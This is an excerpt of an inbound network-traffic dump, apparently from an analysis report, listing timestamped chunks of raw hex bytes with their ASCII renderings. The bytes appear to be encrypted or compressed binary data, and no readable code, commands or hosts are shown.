                                                                                                                                                2022-09-29 12:49:46 UTC10823INData Raw: 21 b6 2d 3c 12 c5 11 b2 8a c8 1e c7 18 07 f3 38 4a 11 8f 25 ed 9b 29 ca 70 96 e5 b5 06 85 ad 1c 3e 32 f1 c2 7c d5 11 4c 6b d9 c7 25 2c 4f a8 d1 4d 66 b8 0e 6c 5e 6b ba fc 09 87 48 c4 1e 85 86 da a1 4c 1a 70 8b c3 1d bf 09 5d b3 56 9f cc ed cd cb d0 8f b1 7b a9 de eb 9a 44 53 9e 93 45 c6 7d e2 5c f2 0e ed d8 57 cc ef 9e 7e 3d fa 3c 1e 9c e6 29 8f f2 a3 d9 d2 78 82 46 8e 55 6f 1f 23 42 4c 8a 19 04 67 e9 f0 62 9b 6b 02 ac 29 8b 84 0d aa 4d 73 27 15 1f 00 03 65 1f 08 7d 44 4a d7 e2 a2 58 d7 47 39 a3 db 21 69 8a 79 af c9 0b 10 8c d8 6f 0d e6 58 1a 97 ae dd 49 96 0e 1f 44 fb bc 9e 93 33 db a1 ca 35 c5 c0 2c 02 c4 6e c3 69 9e f1 f3 0b 74 7f a6 d6 05 fd dc c6 9f 07 0a cc 30 0c c0 eb 1e 11 2b 88 ed 41 16 51 32 3f ec 17 4a ba c8 ca a9 f6 d5 73 e6 43 ec 48 1c 29 0c
                                                                                                                                                Data Ascii: !-<8J%)p>2|Lk%,OMfl^kHLp]V{DSE}\W~=<)xFUo#BLgbk)Ms'e}DJXG9!iyoXID35,nit0+AQ2?JsCH)
                                                                                                                                                2022-09-29 12:49:46 UTC10839INData Raw: fa 9c 3d 5c c8 ab 71 0c 80 42 09 d6 70 e1 f8 90 60 55 42 e0 54 96 ab 96 9b 66 32 8d c7 78 50 88 0c a1 6e 7e eb bb bf 9e 49 50 59 67 62 75 de 4b b3 86 43 46 dd ba cd b1 6d 90 76 5e e4 ad d2 89 37 c1 f3 7b 15 d7 38 a9 af 2d 0f 57 bc 9b 93 b2 aa 33 05 09 af d2 85 72 87 f3 a9 73 3d 7e 7e be 82 dc 8a 8a ff 61 a5 80 c2 10 d4 cb e1 20 58 69 d6 91 16 0d e8 c8 37 79 5d 2f 47 60 20 11 69 4c 2d 84 c9 58 5d d2 30 95 cb 17 6f 88 c3 32 c3 b9 07 c1 27 f0 07 3c c6 f6 cd e6 ce 6c ad a5 c9 0f 65 aa b2 65 a2 54 c1 b6 0d f7 0f 96 b3 20 6a 94 cc fa e1 07 e5 73 dd ed 3c 59 f6 94 44 73 02 a8 45 ed 24 0f db 45 1b 6f fd 97 a2 3a 74 b3 c9 41 75 ca ef dd 67 93 ca 02 ee b2 74 f8 37 36 a7 18 ab 22 39 65 1d a5 4b 7c de 74 01 0f f5 d1 2a 37 d1 35 83 66 c2 5e 4c 51 f3 2b 58 fb 70 36 37
                                                                                                                                                Data Ascii: =\qBp`UBTf2xPn~IPYgbuKCFmv^7{8-W3rs=~~a Xi7y]/G` iL-X]0o2'<leeT js<YDsE$Eo:tAugt76"9eK|t*75f^LQ+Xp67
                                                                                                                                                2022-09-29 12:49:46 UTC10855INData Raw: 58 cb 79 79 10 28 fb 2b b2 8c a6 b4 81 cb be 67 d0 5f ca cc 3b 89 9e 59 b2 95 f7 0d 35 ad 2f 03 ab 35 a5 c0 3a 5d ab 03 e3 df ee b6 03 d5 40 59 3e 20 67 82 8c cb 59 06 d0 47 32 5c ad e1 22 29 74 3e 0f 0d da 9e fe 25 50 72 9f b0 ff b6 6c e8 65 db ac f8 36 2a 95 e5 6e 5b 4f f4 3e 7b 70 bf 18 c2 e4 9b 1c 5f b0 66 8a a2 af 0f a8 41 dd 8c c4 79 17 7f 10 bc 50 0b 72 99 86 fd 93 de 0e 3c db f2 96 f7 54 d0 98 f3 b1 0e bf 02 91 b2 79 0f be d6 e0 c0 5b a4 bd 02 78 5c 11 03 88 4e a7 3b 82 ef 38 d3 ee ae 22 30 6c da 5c 93 fe f7 6a c8 6f 90 ee a8 14 75 fe 8f e9 80 1a 4f 04 21 2c 34 be 7a 0f fc cb 27 27 46 e6 bb 09 71 c2 d2 99 65 59 89 cd cf 03 4d 9c 0e 70 f1 d0 73 a8 57 fd 73 ca e7 a9 0f 72 6b 56 99 72 04 af 80 90 ea c8 00 d5 f6 63 ab 1e 7e 67 15 69 e0 e6 9a 11 3a 51
                                                                                                                                                Data Ascii: Xyy(+g_;Y5/5:]@Y> gYG2\")t>%Prle6*n[O>{p_fAyPr<Ty[x\N;8"0l\jouO!,4z''FqeYMpsWsrkVrc~gi:Q
                                                                                                                                                2022-09-29 12:49:46 UTC10871INData Raw: 0f 26 2e d8 13 3c 80 35 f2 66 bc 9d 50 92 37 8f 68 eb b0 f1 84 4a a6 6b 9d 2d 39 19 fe c1 ef 6f 0c 81 44 ac 33 75 d8 1e 16 1c 64 f7 f4 04 3a e6 8f 05 38 9d 35 ce 40 2d d8 d5 71 7c 1d 88 f1 f1 a3 85 bd 32 55 76 f1 9f b7 64 84 5d 50 20 87 37 67 14 58 9e a8 db d2 51 ec 84 d9 ee 6d 0f 79 bb 3d 80 19 ab 07 de 14 5d f8 7a 30 da 34 89 f4 c8 4c eb cf 99 f6 e4 b1 b3 b3 05 2f 63 72 9d d8 11 29 54 59 14 bd c9 fe 6e 5c 73 d5 b6 d2 da 45 9e 00 a2 91 44 65 45 91 a4 a1 4e 08 3b 2d 95 11 81 a3 c6 96 46 d6 39 ec cf 9a f0 74 de 48 84 3f 82 a6 f2 ad 34 ae ed 52 e1 1f 0a 2f 03 60 b9 2e 45 f9 73 2e e6 da 24 4e f8 61 5d 6d 52 ae 2e 76 f6 e0 0c ab a7 0c ea 9a d9 1b c8 d1 b4 a7 62 fb 52 bb 23 5c 38 8a aa 75 63 3d 8c dc 97 39 f7 07 0d c5 d7 d0 97 9f fd c9 77 ac 23 02 5d a4 53 ca
                                                                                                                                                Data Ascii: &.<5fP7hJk-9oD3ud:85@-q|2Uvd]P 7gXQmy=]z04L/cr)TYn\sEDeEN;-F9tH?4R/`.Es.$Na]mR.vbR#\8uc=9w#]S
                                                                                                                                                2022-09-29 12:49:46 UTC10887INData Raw: 82 ae 07 9a 6e aa 0a 57 af be 0d e5 aa c4 c9 e9 c1 f3 03 e5 c0 af 4c 8f 13 a4 30 61 ac 29 f4 2d b3 14 46 50 aa 94 84 ac 4a fc 31 a2 4a bf 84 e6 f3 19 27 2d 64 ed 05 05 42 d3 6e ae 05 38 b0 9a d6 88 c8 8d 07 2e dd 65 88 ce 16 87 79 51 af aa 46 78 3b e9 30 2b 2a ae 93 58 fc e4 ce 71 05 09 c5 9c 7f 98 a0 54 22 c7 ce 85 c1 de 9e 21 2a ec 58 aa a8 6a c2 84 d4 d4 37 0e 21 fb e0 d4 2f a8 74 16 a6 92 7b d4 71 34 47 f9 23 46 5c bc 16 3d 1a a4 f4 c5 6f f5 0b 4f cf a4 85 c5 8d 0c 73 76 9c 4d ed 51 1b 08 56 d1 a0 cd 33 93 f7 ea 74 ce 97 a7 36 23 ef ed 0c 81 20 8b ff c3 6f e3 5f 7d b4 c0 5f 0d 7f 28 23 c8 53 bb 99 eb 44 33 83 fa 73 8e b7 5e 6b 01 a8 22 a5 a1 ea cc 6a fa 30 a0 58 6d 43 8b e9 c2 5e da ac e7 14 ca d1 ee d0 1f 9a e5 0f af 78 f6 d8 3e 9d eb ac 9a 0e ef 4f
                                                                                                                                                Data Ascii: nWL0a)-FPJ1J'-dBn8.eyQFx;0+*XqT"!*Xj7!/t{q4G#F\=oOsvMQV3t6# o_}_(#SD3s^k"j0XmC^x>O
                                                                                                                                                2022-09-29 12:49:46 UTC10903INData Raw: 4c 2a 4f 1f 6e a5 a3 e5 e8 aa 64 8c a2 74 b2 21 f2 e7 3e f6 a5 f5 9f 4d 38 6f 4a b0 47 dc 7f 59 ae 76 86 a1 22 38 a4 fc dd 6d 42 a2 6e 4f 84 95 81 61 f0 3d 0f 78 0c f0 90 d3 0e f9 87 6c 50 c1 32 ce 05 ff 69 11 66 a2 a6 39 3c 10 7d ef c9 e1 0f d0 bd de 72 42 a9 21 57 0a f4 a6 a8 4e f9 08 07 f4 b2 ca 71 cd c5 4e a7 71 f0 2f 60 5c c5 d3 9e d4 1c 32 8b 48 22 39 aa 40 2f f7 cb 96 6f f7 28 f9 c2 0d 01 33 01 c1 69 98 c3 3c 55 19 34 9e 52 be 6a 9f 3c be c6 c3 10 c6 f5 76 0c f5 bb 48 2a fd df 2c 29 6e ea bb 39 69 eb f4 b7 18 ad ac 6c 91 71 01 3b e9 0b bc 56 c3 15 0d cc a5 31 8e 2e 07 ad a6 b9 f2 e6 2d 97 f6 f8 80 59 0b 77 7d 85 81 80 51 1e 2a 82 1d 9d 0c 14 54 58 31 0b c0 55 9f 27 6e 25 18 79 fe 14 7a 49 dc 1a f0 9c ce b6 43 c8 32 cf 9a 45 51 e8 d6 29 45 fe c5 e4
                                                                                                                                                Data Ascii: L*Ondt!>M8oJGYv"8mBnOa=xlP2if9<}rB!WNqNq/`\2H"9@/o(3i<U4Rj<vH*,)n9ilq;V1.-Yw}Q*TX1U'n%yzIC2EQ)E
                                                                                                                                                2022-09-29 12:49:46 UTC10919INData Raw: ea 80 03 07 c1 5c 88 c2 78 97 e7 d1 ac c3 5d 13 f9 8b 8f fa ea a7 71 3c 2b 2d ea 7b 9d d2 43 22 7d 30 13 bc 9c 1e b5 79 c7 d0 d8 48 30 20 7f 52 2c 1d 96 94 10 5d eb 14 da 31 a5 44 74 31 ea ef da ad ff 5f 7e 0e 68 9f 74 ed ac 39 28 54 5d e2 2c 97 e8 79 f7 47 12 5e 00 6c 52 55 94 41 d5 cd 27 3a b0 ff ba e0 3c a8 e4 ce 5e 17 bb 3a e1 29 e9 2e cf 8d 71 2d 16 f5 83 94 eb ac 4f b7 3d 2b 36 ee 22 66 c2 4d a1 54 16 59 94 0c b0 96 b0 d5 c1 2f 98 eb db cd dd ed 96 b2 ac 96 f8 a2 6d 2d e7 cd 35 eb 25 7c a4 9a f9 67 12 dc 6e 9a de 03 95 af 29 50 51 a7 df 2f 87 23 dd 91 b3 09 1e e0 e6 98 22 2b 38 16 d9 e4 6c b8 a8 f4 36 9a f3 53 71 bf 1e 3c 34 bf 7b 86 ab 90 b2 8c ca e6 5e 96 92 c0 5b 04 48 70 9b e9 45 3c e6 be 81 47 ee 33 10 7c 28 72 49 a3 72 08 f4 e2 1e c9 37 b2 0f
                                                                                                                                                Data Ascii: \x]q<+-{C"}0yH0 R,]1Dt1_~ht9(T],yG^lRUA':<^:).q-O=+6"fMTY/m-5%|gn)PQ/#"+8l6Sq<4{^[HpE<G3|(rIr7
                                                                                                                                                2022-09-29 12:49:46 UTC10935INData Raw: 6a 24 77 6d dd ee a9 92 a3 b0 40 d0 e0 e3 3d 3f 04 77 e9 1a 83 f7 a4 a7 91 52 49 04 27 b6 79 c5 e1 15 69 68 a9 9e 49 19 19 e7 19 62 e5 55 f1 1d 0d b0 90 e5 17 1d 36 34 c1 9c 39 ff 92 08 bb 81 f9 7e ff a5 3e 7c ac 0e 1d 2c 71 23 8d b1 82 05 70 8e 97 82 61 e2 49 84 1e 9a ec 6f 1e 74 91 38 45 12 62 87 d7 fc a7 ef 85 d8 71 55 be 26 6c 81 c2 ca 26 36 30 32 ac 91 56 0c 26 23 43 a5 9b be a6 3f 02 49 d9 0c a3 f9 f4 3f 3c 4a 4c 60 d9 6f ae 3b 31 d5 c9 c3 ef 9e 55 5e 99 76 40 6c cf c3 18 1b 05 7a e8 8c 3a 69 19 67 59 ed 31 df ae bd 8f 06 00 cc 58 9f 2d d0 c8 03 af 1d 24 5a 8b 78 c4 3b 48 53 db c7 a2 95 28 a4 22 d2 77 a6 c7 a2 30 08 68 20 94 6d df 47 35 df 03 72 18 c9 21 76 ca 2f a7 1f 86 ab 1f 1f ce cd 77 25 25 5a 55 b8 34 7f d6 21 02 1c 0d a7 2a 2f 26 5a d3 67 07
                                                                                                                                                Data Ascii: j$wm@=?wRI'yihIbU649~>|,q#paIot8EbqU&l&602V&#C?I?<JL`o;1U^v@lz:igY1X-$Zx;HS("w0h mG5r!v/w%%ZU4!*/&Zg
                                                                                                                                                2022-09-29 12:49:46 UTC10951INData Raw: 1b 42 e8 8a e8 d3 d2 aa 07 18 15 f9 56 e6 2d 1f cf 21 ee 97 f0 4f cd 56 d5 3c 2e 54 9e 3c 70 d8 7c 0d 9a 51 79 36 3e 4f 2a 42 0c 00 8f 79 a4 79 dc 4a 56 81 4d 60 df b1 ad 7a b4 9f 3b ad 33 96 e7 23 49 01 be bb b6 4f d5 5a ce 28 a3 26 04 50 48 cf 03 d8 36 38 57 08 18 b1 7b 20 f5 09 c4 ed 84 db 95 36 8e de 14 df c7 2a 11 8e 9d 72 bc cd c6 67 db ed a3 f7 46 3b 40 bd 9b 66 62 79 15 ee 2e d1 06 e4 5f d7 f8 86 e6 37 30 b6 bf 24 22 4a a5 c9 83 9c 5a f4 f5 00 20 13 ea 75 52 f0 69 52 6a 55 e6 73 bb e7 2e 1d 79 d7 3a 18 cb a0 29 5f f1 82 0d 4b ab f6 5c e1 a3 b6 d1 b0 d5 57 44 00 c0 f8 b7 6b b9 6c 57 3a 42 95 be 4f cf 27 2b c4 c9 24 ca 1c 8d 55 65 5a f3 78 0a d6 d2 12 dd de c4 eb a9 24 9d 1f c4 c3 15 bf 57 92 5e 9c 18 ca aa ed 16 40 38 75 83 71 08 32 80 c4 ad c4 18
                                                                                                                                                Data Ascii: BV-!OV<.T<p|Qy6>O*ByyJVM`z;3#IOZ(&PH68W{ 6*rgF;@fby._70$"JZ uRiRjUs.y:)_K\WDklW:BO'+$UeZx$W^@8uq2
                                                                                                                                                2022-09-29 12:49:46 UTC10967INData Raw: 5d ce e3 99 e0 92 09 8a a0 27 72 d0 c6 40 ec 7c 14 98 b2 20 d0 de d2 59 67 8d 82 4d 32 c2 56 b0 af 39 c3 50 07 30 18 89 2d 52 66 60 1a 6e 75 a0 3e bf c6 90 aa d3 4e 72 ba d3 8a 1e f5 84 92 58 15 bf a6 9d 6b 8c e1 b9 c7 60 0a 04 d2 09 11 e7 13 1f 56 52 67 9b d7 fb e0 5d ce 83 19 1f 80 4a db 17 54 79 9f c3 b7 42 68 c6 25 6c ad e5 ad da 8a c0 1c 62 f8 5f 7b 3f c3 c9 59 23 c4 ca b2 5b f2 d3 84 a1 24 89 fa f0 1a 76 30 18 9b f5 8e fb 59 fe 29 69 ce 58 ec fb af b7 83 37 d8 92 cf 2b c1 bd 12 44 5e 6e 9e 93 d7 f5 4a ff 5c cd 61 bd 37 3b 57 cd 61 80 97 c1 64 20 01 00 5b 30 19 a8 96 b4 13 83 be e7 15 98 e7 b3 b2 ff 8a 04 4e a8 a1 0b 25 a7 ba 9d b7 75 86 72 54 9a 2e 89 a4 58 45 e5 40 35 4b 53 ed 6a 39 d6 f4 ca 4d 30 2f ad c6 1c af 2e 4e 13 a8 0b d4 aa 71 64 0e 72 41
                                                                                                                                                Data Ascii: ]'r@| YgM2V9P0-Rf`nu>NrXk`VRg]JTyBh%lb_{?Y#[$v0Y)iX7+D^nJ\a7;Wad [0N%urT.XE@5KSj9M0/.NqdrA
                                                                                                                                                2022-09-29 12:49:46 UTC10983INData Raw: 03 cf 90 b0 b8 a9 62 80 bf 6a e1 ee c1 40 d4 19 65 44 92 c5 70 06 00 00 fd f8 f0 4c d1 46 65 9c b8 0e 1c c9 b9 c0 d6 de 12 0f 06 52 57 8a 22 e1 60 33 e6 87 12 7c bf a8 24 a2 57 17 53 94 0d 5b a0 78 7b f0 24 97 78 cd 59 72 15 05 c3 cc c1 2c 26 18 39 99 79 95 70 07 72 e1 9c 10 8d 91 0e e0 77 1f 3d 6c 8f ed 7f 22 ce c6 2a eb dc 61 fd 31 0e d7 9c c5 a5 97 17 ca d5 0f 59 08 3b 0e 87 1e aa b9 2c cc 9c 93 c6 3e 79 21 c3 db 7d 51 8b 4c 5f 60 a8 de f3 bb a2 cb 3a aa 09 ca 8d 8c 52 28 43 72 7c 67 fb 90 a8 33 37 ea df 81 78 06 f4 68 89 bc e7 65 ae 37 c3 d2 17 97 27 c0 09 89 ba 6a d2 b3 5e 61 62 24 78 3d 27 92 81 b6 f8 53 82 e8 7c 7e f0 18 82 b0 70 5a 2e f2 bb 98 70 19 e0 5e 6f ee 88 66 aa 61 aa f9 06 35 12 55 9d 41 4e af b1 93 9f 8b 52 71 66 75 b4 cf f4 b0 56 df e1
                                                                                                                                                Data Ascii: bj@eDpLFeRW"`3|$WS[x{$xYr,&9yprw=l"*a1Y;,>y!}QL_`:R(Cr|g37xhe7'j^ab$x='S|~pZ.p^ofa5UANRqfuV
                                                                                                                                                2022-09-29 12:49:46 UTC10999INData Raw: 52 77 a3 fe 10 5e 0f 43 6a 5a 03 4d e7 7e ea c8 0a ec fa 58 53 d3 72 4e 24 7b 85 de d9 3a a2 38 21 15 69 26 d4 02 d0 96 5e d6 ba ef 2b 33 d5 86 58 76 20 6e a4 74 c2 57 a1 51 37 f7 fa ed 01 a6 61 85 77 9c 4f 92 6a 41 82 ce 49 82 56 2c 07 22 48 0e ac a4 be de 9e 29 7a 59 99 6a da 64 4a a9 3a 8d 6c df 6e df bc 5f 20 d0 f6 29 40 13 a8 cc 32 02 47 24 42 a4 7d 63 de af 64 74 f5 7a 36 07 44 15 a4 fe ff ef 35 84 eb 35 42 2a 0a 62 9b 4a 2b 9b 45 15 67 88 d6 cc 0b a4 08 5e ca 47 80 87 96 93 a9 62 62 5f 34 f6 61 d2 3a 39 c9 5a 48 85 d9 ab c8 fa 7b 13 21 dd 43 49 d9 84 a3 9a 08 0e df 73 5e ab ec 24 b8 5f c7 63 db 2e 62 e8 d2 0d 20 16 fe 62 cf 25 fc 55 2c 3e 14 a9 22 cc 51 7b 38 46 52 f1 f8 97 bc c2 62 a5 45 e3 3e 5b 97 fc da 52 69 6a 19 a8 49 24 bf 8e ac 69 90 cc 59
                                                                                                                                                Data Ascii: Rw^CjZM~XSrN${:8!i&^+3Xv ntWQ7awOjAIV,"H)zYjdJ:ln_ )@2G$B}cdtz6D55B*bJ+Eg^Gbb_4a:9ZH{!CIs^$_c.b b%U,>"Q{8FRbE>[RijI$iY
                                                                                                                                                2022-09-29 12:49:46 UTC11015INData Raw: 6a ff 7f d5 91 3e fd 49 96 e7 25 74 04 12 e6 93 70 9e f7 5a 2c 2d 3e 40 23 e4 ac a6 10 10 cc 57 86 b5 91 32 ce 20 e4 63 4e 13 22 42 49 45 ca 0c e1 0e d1 62 00 25 cc b6 42 85 4e 2d fc e3 10 53 c7 fa ad 3d 4f d8 7e 3b 0c 26 52 3e ca e0 f8 c4 f6 7b 38 fe ba 54 e8 13 b4 ef fa 6a d1 8b 7c 3e ba 9f fc 71 82 fa 3c df 19 14 7b b6 2e 3b c8 46 3d 91 ee 12 0a 42 2f 53 2f cf 2d 34 30 0e 4a 09 4b c1 00 f4 83 0d e9 2f 02 2c 23 b8 a2 86 17 03 11 c4 b8 fc 7f 78 dc 0f b3 9c b9 46 1b 33 89 86 77 1d fd a2 df 5f 76 e3 be a5 21 23 f7 58 c6 72 f4 3c a2 25 70 8b 42 43 bf 16 bc 91 5f f7 a4 af f8 16 8b eb bc a2 3b 20 e2 0f 90 55 5d 15 7d 23 59 6d 31 1c 39 62 c8 f7 24 e7 c1 ea 82 e9 f2 e8 0c d6 82 f3 34 fe d2 09 ff b7 65 75 ad 25 1f 23 6a 4d a4 0e 42 e9 33 b9 83 e4 79 04 80 09 86
                                                                                                                                                Data Ascii: j>I%tpZ,->@#W2 cN"BIEb%BN-S=O~;&R>{8Tj|>q<{.;F=B/S/-40JK/,#xF3w_v!#Xr<%pBC_; U]}#Ym19b$4eu%#jMB3y
                                                                                                                                                2022-09-29 12:49:46 UTC11031INData Raw: 2c 0d 18 67 1b ac d9 62 79 d3 91 6d ae 8f 5f 27 4f 7b 73 36 90 76 b5 67 aa 6f b4 f3 43 0b 80 ff 9d 80 cc 23 78 2b 5d b3 54 ad 32 11 cd 51 c9 9b be fc 8f 2f 8f 87 6c 2f 3f 3d 25 2e 47 1a 7d 9e 1f 42 98 12 a6 13 75 ff e9 1e 00 02 70 e6 7b a7 f9 83 e1 23 3e 54 68 5e fa ee ad 73 9e 3e 21 2a ca c8 35 b8 d0 0d 86 e5 4c b6 6a 7a 09 48 19 78 87 af 20 6d 15 c0 f9 2b 8b a6 22 70 8a fd 46 a1 ee fe cc 5e c0 df 3a b6 49 13 d3 6a bd 5b 7a df a2 17 bc aa 8b 60 cb 77 fa 96 c2 ea 09 31 1f f1 c6 a3 a6 e8 e6 48 43 61 0f 38 67 97 ce 14 b7 96 84 22 5a 93 5a c3 e0 58 80 bf c4 40 df 9b 30 63 c7 4b 61 4d 6e 93 07 8e ed 7b 0e 7a 7e 75 e0 2f 83 d8 40 68 34 48 58 ce 62 a6 93 68 c9 db 0b 2c 8e 1f bd cd da 83 66 e6 36 4f 88 f9 22 4a 85 a2 7c 44 9b bf db c8 82 3c ca 03 c8 4b e7 6a 4d
                                                                                                                                                Data Ascii: ,gbym_'O{s6vgoC#x+]T2Q/l/?=%.G}Bup{#>Th^s>!*5LjzHx m+"pF^:Ij[z`w1HCa8g"ZZX@0cKaMn{z~u/@h4HXbh,f6O"J|D<KjM
                                                                                                                                                2022-09-29 12:49:46 UTC11047INData Raw: 70 c4 6b 51 26 05 e3 20 52 92 3d fc 2d a0 2e 72 ee 5c ab 55 6b b3 11 0d 60 ca 4a bf 1e fd d6 04 5d 0f 06 9c ef 20 6b 5f 41 17 6f 80 d8 ac b2 06 c9 b8 73 10 26 ab cb f1 79 c4 4a 48 72 9a 1c 55 6f fb f2 26 db fa 9c 7e fd 11 01 be ef ff 31 0c c6 f7 0b 76 e3 22 bf b5 67 89 30 12 d3 20 07 ec ea a4 94 1a c2 04 c0 14 c2 b9 b8 60 d9 f6 fd 01 13 1d 6d 02 e5 f6 77 64 0e b5 d7 1b a1 8d 0a af 30 58 5f 6c 08 25 7a da bd d4 1c 4b 21 ed 42 ff 0e 29 c3 8f fc 02 f7 de 78 2b 8b 5f 33 8d 94 b7 ba 0b 3d 18 f1 89 c8 07 34 fe c7 10 f9 5f 41 30 03 fc 86 f6 47 31 39 99 75 60 12 33 a9 6d 13 7b d0 0e 0d 45 e4 68 9c d7 9c 64 6a b2 23 e0 75 10 cc b9 50 18 bb 27 3b 2a 5c 22 4f b6 c2 32 35 da f6 a4 f1 9d 1c c4 6f 28 76 db 5d ee 0b a2 95 50 6e 21 eb 9e bf e6 bd 3b 41 83 f6 e7 6e 8d 05
                                                                                                                                                Data Ascii: pkQ& R=-.r\Uk`J] k_Aos&yJHrUo&~1v"g0 `mwd0X_l%zK!B)x+_3=4_A0G19u`3m{Ehdj#uP';*\"O25o(v]Pn!;An
                                                                                                                                                2022-09-29 12:49:46 UTC11057INData Raw: 20 0d 3e e0 6f 39 d2 3a 86 ae a0 47 c8 c3 1f b9 df 2d e2 07 ad 7e 28 bd 91 52 8a e4 11 a0 8b 1c b4 6d 57 34 a4 60 1e f8 0b 71 8d 3e 79 8f d5 4d 5d 7a 04 5f 85 cb 58 cc 20 e5 31 b0 58 9b c9 93 7d c7 3e 88 9f 90 21 fb 12 89 6a da 85 5e 57 4f 84 f4 6b 0b bc 4d 42 a2 ca 1f af 99 8b 3f 77 e3 77 78 c7 2b 98 bc cf 1a 6d 30 47 0b b9 30 d1 cc 8e 6a b9 11 69 59 b2 43 75 ed e0 e9 ee 70 43 ab 38 8f ae bc 3c 3c 72 1b a6 c6 69 cf cc c0 36 37 19 5f 91 bc 51 46 f1 0f 08 d7 00 cb 2b 2e d9 0b 04 08 42 be 09 56 dd 50 32 b0 0c 0d 8e 53 02 6e f8 2d f5 9e fe 2f d3 77 33 37 6e ef 4c 99 18 50 80 a7 ae 50 28 99 1a a7 f6 79 dd 6a fd f6 5c 88 01 28 fb f6 c3 0e 0e 70 a7 d9 dd 6e a1 a5 bc ee 4e f6 57 d5 03 a3 e8 14 b4 86 1b fb 35 03 fe 5f 01 33 da 7d 8d 64 1d f7 5e 31 ef a8 bd c3 30
                                                                                                                                                Data Ascii: >o9:G-~(RmW4`q>yM]z_X 1X}>!j^WOkMB?wwx+m0G0jiYCupC8<<ri67_QF+.BVP2Sn-/w37nLPP(yj\(pnNW5_3}d^10
                                                                                                                                                2022-09-29 12:49:46 UTC11073INData Raw: 25 e9 22 86 c2 c4 82 00 d5 99 65 d5 8e ba b4 c3 de 96 32 9a 56 1c ea 95 6c 1c 4f 4a 57 da c7 7f cb 56 07 38 f6 0a 44 9f af c5 65 9d 0e f4 79 01 61 1f b1 d1 10 01 f9 8b 2c a5 3e 5d 9b dc a1 69 f6 3b 4f 95 c5 d3 8e 7f c3 ef 9a 8b 0f 21 80 54 61 ae 7d dd b8 87 a1 dd 3e 9f 15 6c a8 c9 bf 99 f1 c2 99 88 55 07 bc 7c 0b a8 98 2d 08 a2 b0 ce 3c b2 fe 16 1a a9 39 5c 1b 52 68 0a 5f 34 30 63 28 34 66 4d 2c 3b 5e 91 a3 de b4 9b 7d 86 dc 06 bd fa b6 3c df 35 a1 24 da 21 24 f8 23 63 8d 09 d5 a9 fc 84 99 46 ae d5 9d dd a1 9c fd 68 19 5e f6 f2 74 8e c4 e4 6b 64 ae 7b 82 f3 d7 6d 1e 5a 06 cd 2f 78 4f ea 51 ac 3c 8a b6 80 9b cf 2d 6d f8 10 3b e5 dd 1f 20 bd 83 41 ec 81 87 bf eb e9 86 04 1b 4a fb aa 6a ee b4 2a 86 15 dd 68 b2 14 bf 03 7f 15 31 fa 0e 69 fc eb 49 38 b5 c1 ea
                                                                                                                                                Data Ascii: %"e2VlOJWV8Deya,>]i;O!Ta}>lU|-<9\Rh_40c(4fM,;^}<5$!$#cFh^tkd{mZ/xOQ<-m; AJj*h1iI8
                                                                                                                                                2022-09-29 12:49:46 UTC11089INData Raw: f7 9c 76 a1 a7 1c 6c 71 3b b1 2f bb 01 6d 80 fe 30 9c b6 80 e7 ea 5a 45 98 89 a4 af d0 5a a2 60 26 0c 62 27 fd 2f e5 6f b6 e7 aa b5 98 a6 05 53 50 21 be 97 e3 d1 3c 5a bc 19 09 8d 30 7d 50 69 f2 3d e6 d6 df 72 ce 8a db 04 13 5d 5c cd 30 35 d0 ac 73 49 69 77 49 91 11 50 57 a5 18 78 d8 a2 05 d8 45 dc 03 29 f4 69 eb 07 7c 96 1b dd 16 bf 0f b9 75 68 e8 1a c8 f6 48 6a a1 2e 88 6a c2 f0 89 1d 3b 66 6e 85 d5 c3 98 ae 05 c5 35 c4 90 e2 22 30 c5 84 36 11 2f b6 36 50 b6 5b 96 3b 3c 41 ad 02 29 08 9d f0 f0 9f 5d 79 af de c8 e1 84 3d 56 42 f5 d7 93 61 c5 a9 8e f0 e5 b8 a7 c1 d2 ce 96 f5 93 9d e2 3f 41 2e 15 eb 70 a3 78 d7 9a b4 c3 55 79 4a 89 d7 21 77 54 b6 3d 1b a3 e9 19 d0 de 50 5c 3d 09 a9 dc 67 6a cd d1 85 22 38 e2 99 75 24 2f 50 0a 24 28 ed 20 74 1a 7c e4 d7 75
                                                                                                                                                Data Ascii: vlq;/m0ZEZ`&b'/oSP!<Z0}Pi=r]\05sIiwIPWxE)i|uhHj.j;fn5"06/6P[;<A)]y=VBa?A.pxUyJ!wT=P\=gj"8u$/P$( t|u
                                                                                                                                                2022-09-29 12:49:46 UTC11105INData Raw: ae bd 18 45 44 73 27 8f 3a b1 bb 28 2c 5d 09 51 d7 11 b4 22 b7 47 b9 a4 90 35 f8 49 1a 78 1e d6 ea fc 60 75 84 71 5c 3c b4 ca 7e 94 a0 c5 3b 48 37 3c f1 60 fb 48 d8 69 05 8d 77 73 e7 3d 6a 58 27 e3 62 29 da 3c ee b9 1b 33 cc c7 7d 7b 58 2f 8b 26 cb 50 e5 72 0a 71 44 0a 03 aa 63 94 64 0c fc 7a da 4c a2 48 2d 1e 98 1c 1f 21 45 d4 e8 b5 28 df 95 d5 07 df 05 f3 1e a0 57 a8 c0 25 5e ce 0e 90 18 c4 2a 8c 67 9e da 54 dd 46 74 d3 12 55 a3 92 86 e0 07 0a d1 84 16 3a 24 a2 9b 27 3b a0 4c 2e 88 47 1d 15 a9 ba 0f 84 3a 83 06 42 58 36 aa 50 d4 14 a0 90 66 72 4e 06 2a 36 9d fd 71 18 94 45 44 71 eb 16 ca 70 7f 1d 2f e7 bc b1 ba 3f 68 55 fb 7c ac fb 10 54 c2 89 42 9b 20 f0 65 53 8b f7 d5 8a 76 79 7f 85 72 92 cd 8b 6c 61 89 f3 26 8d e2 dd 94 6c 24 c1 a8 6a 75 78 a3 7f 8a
                                                                                                                                                Data Ascii: EDs':(,]Q"G5Ix`uq\<~;H7<`Hiws=jX'b)<3}{X/&PrqDcdzLH-!E(W%^*gTFtU:$';L.G:BX6PfrN*6qEDqp/?hU|TB eSvyrla&l$jux
